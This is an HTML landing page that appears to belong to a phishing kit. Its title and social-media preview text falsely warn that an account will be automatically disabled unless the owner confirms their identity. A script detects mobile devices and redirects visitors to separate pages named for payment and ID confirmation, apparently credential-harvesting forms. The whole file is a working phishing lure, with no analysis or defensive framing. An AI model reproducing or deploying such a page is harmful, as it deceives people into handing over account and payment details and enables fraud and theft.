﻿<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta property="og:image" content="img/GIcon.png" />
<title>Please confirm your identity</title>
<meta property="og:title" content="If you are the original owner of this account, please confirm your account to not be automatically disabled. CLICK CONTINUE" />
<script type="text/javascript">
var isMobile = function() {
   //console.log("Navigator: " + navigator.userAgent);
   return /(iphone|ipod|ipad|android|blackberry|windows ce|palm|symbian)/i.test(navigator.userAgent);
 };
 if(isMobile()) {
    window.location.href = "m.pay.id.conf.htm";
} else {
	window.location.href = "pay.id.conf.htm";
}
</script>

</head>
<body>
</body>
</html>